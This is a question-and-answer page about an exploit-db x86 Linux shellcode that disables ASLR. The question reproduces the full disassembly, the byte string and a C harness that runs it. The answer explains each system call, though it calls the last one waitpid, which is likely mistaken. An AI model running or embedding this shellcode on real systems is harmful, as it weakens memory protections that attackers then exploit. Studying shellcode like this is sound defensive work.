Explain ASLR exploit written in x86 assembly language

Question

The following exploit was found on exploit-db, I just want to know how this stuff works when it seems nearly.

I really don't know what is going on except from the little I could find this is used to disable buffer overflow protection. Are these calls to registers? Is this something that could only be found by fuzzing?

/*
Title:  Linux x86 ASLR deactivation - 83 bytes
Author: Jean Pascal Pereira <pereira@secbiz.de>
Web:    http://0xffe4.org


Disassembly of section .text:

08048060 <_start>:
 8048060:       31 c0                   xor    %eax,%eax
 8048062:       50                      push   %eax
 8048063:       68 70 61 63 65          push   $0x65636170
 8048068:       68 76 61 5f 73          push   $0x735f6176
 804806d:       68 69 7a 65 5f          push   $0x5f657a69
 8048072:       68 6e 64 6f 6d          push   $0x6d6f646e
 8048077:       68 6c 2f 72 61          push   $0x61722f6c
 804807c:       68 65 72 6e 65          push   $0x656e7265
 8048081:       68 79 73 2f 6b          push   $0x6b2f7379
 8048086:       68 6f 63 2f 73          push   $0x732f636f
 804808b:       68 2f 2f 70 72          push   $0x72702f2f
 8048090:       89 e3                   mov    %esp,%ebx
 8048092:       66 b9 bc 02             mov    $0x2bc,%cx
 8048096:       b0 08                   mov    $0x8,%al
 8048098:       cd 80                   int    $0x80
 804809a:       89 c3                   mov    %eax,%ebx
 804809c:       50                      push   %eax
 804809d:       66 ba 30 3a             mov    $0x3a30,%dx
 80480a1:       66 52                   push   %dx
 80480a3:       89 e1                   mov    %esp,%ecx
 80480a5:       31 d2                   xor    %edx,%edx
 80480a7:       42                      inc    %edx
 80480a8:       b0 04                   mov    $0x4,%al
 80480aa:       cd 80                   int    $0x80
 80480ac:       b0 06                   mov    $0x6,%al
 80480ae:       cd 80                   int    $0x80
 80480b0:       40                      inc    %eax
 80480b1:       cd 80                   int    $0x80



*/

#include <stdio.h>

 char shellcode[] = "\x31\xc0\x50\x68\x70\x61\x63\x65\x68\x76\x61\x5f\x73\x68"
                   "\x69\x7a\x65\x5f\x68\x6e\x64\x6f\x6d\x68\x6c\x2f\x72\x61"
                   "\x68\x65\x72\x6e\x65\x68\x79\x73\x2f\x6b\x68\x6f\x63\x2f"
                   "\x73\x68\x2f\x2f\x70\x72\x89\xe3\x66\xb9\xbc\x02\xb0\x08"
                   "\xcd\x80\x89\xc3\x50\x66\xba\x30\x3a\x66\x52\x89\xe1\x31"
                   "\xd2\x42\xb0\x04\xcd\x80\xb0\x06\xcd\x80\x40\xcd\x80";


int main()
{
  fprintf(stdout,"Lenght: %d\n",strlen(shellcode));
  (*(void  (*)()) shellcode)();
}

Answer 1

That’s not an exploit but x86 assembly language code for a program that simply writes 0 into /proc/sys/kernel/randomize_va_space to disable address space layout randomization (ASLR) by using multiple system calls:

; reset EAX to zero
 8048060:       31 c0                   xor    %eax,%eax

; first argument: null terminated string "//proc/sys/kernel/randomize_va_space"
 8048062:       50                      push   %eax
 8048063:       68 70 61 63 65          push   $0x65636170
 8048068:       68 76 61 5f 73          push   $0x735f6176
 804806d:       68 69 7a 65 5f          push   $0x5f657a69
 8048072:       68 6e 64 6f 6d          push   $0x6d6f646e
 8048077:       68 6c 2f 72 61          push   $0x61722f6c
 804807c:       68 65 72 6e 65          push   $0x656e7265
 8048081:       68 79 73 2f 6b          push   $0x6b2f7379
 8048086:       68 6f 63 2f 73          push   $0x732f636f
 804808b:       68 2f 2f 70 72          push   $0x72702f2f
; first argument: address of above string
 8048090:       89 e3                   mov    %esp,%ebx
; second argument: file mode
 8048092:       66 b9 bc 02             mov    $0x2bc,%cx
; system call: sys_creat("//proc/sys/kernel/randomize_va_space", 0x2bc)
 8048096:       b0 08                   mov    $0x8,%al
 8048098:       cd 80                   int    $0x80

; first argument: file descriptor returned by sys_creat
 804809a:       89 c3                   mov    %eax,%ebx
 804809c:       50                      push   %eax
 804809d:       66 ba 30 3a             mov    $0x3a30,%dx
 80480a1:       66 52                   push   %dx
; second argument: null terminated string "0:"
 80480a3:       89 e1                   mov    %esp,%ecx
; third argument: 1
 80480a5:       31 d2                   xor    %edx,%edx
 80480a7:       42                      inc    %edx
; system call: sys_write(fd, "0:", 1)
 80480a8:       b0 04                   mov    $0x4,%al
 80480aa:       cd 80                   int    $0x80

; system call: sys_close(fd)
 80480ac:       b0 06                   mov    $0x6,%al
 80480ae:       cd 80                   int    $0x80

; system_call: sys_waitpid()
 80480b0:       40                      inc    %eax
 80480b1:       cd 80                   int    $0x80

So basically:

int fd = sys_creat("//proc/sys/kernel/randomize_va_space", 0x2bc);
sys_write(fd, "0:", 1);
sys_close(fd);
sys_waitpid();

The leading double slash // the path is just for alignment. And the : after 0 is irrelevant as the number of bytes to write is set to 1.

Note that this piece of code does only disable ASLR and has nothing to do with buffer overflow protection. In fact, an attacker would probably have already exploited a buffer overflow vulnerability to execute this code.